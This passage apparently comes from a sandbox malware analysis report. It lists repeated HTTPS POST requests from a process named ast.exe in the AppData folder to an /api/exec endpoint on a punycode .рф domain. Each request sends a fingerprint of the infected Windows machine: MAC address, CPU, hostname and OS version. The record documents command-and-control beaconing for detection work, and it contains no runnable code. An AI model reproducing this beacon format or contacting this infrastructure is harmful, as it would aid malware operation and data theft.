                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:35 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                19192.168.2.450046212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:36 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:36 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                20192.168.2.450054212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:37 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:37 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                21192.168.2.450062212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:38 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:38 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                22192.168.2.450071212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:38 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:38 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                23192.168.2.450089212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:40 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:40 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                24192.168.2.450098212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:41 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:41 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                25192.168.2.450103212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:42 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:42 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                26192.168.2.450106212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:43 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:43 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                27192.168.2.450109212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:44 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:44 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                28192.168.2.450112212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:44 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:44 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                29192.168.2.450115212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:45 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:45 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                30192.168.2.450118212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:46 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:46 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                31192.168.2.450121212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:47 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:47 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                32192.168.2.450124212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:48 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
                                                                                                                                2024-11-19 17:56:48 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 77 73 73 6f 6a 63 67 66 66 71 6e 6a 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 34 39 66 32 65 63 64 34 36 30 36 36 39 33 39 36 35 66 32 33 34 65 64 35 61 31 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 32 31 36 38 36 35 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                Data Ascii: 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                33192.168.2.450127212.193.169.654438036C:\Users\user\AppData\Roaming\im\ast.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-19 17:56:48 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                Content-Length: 269
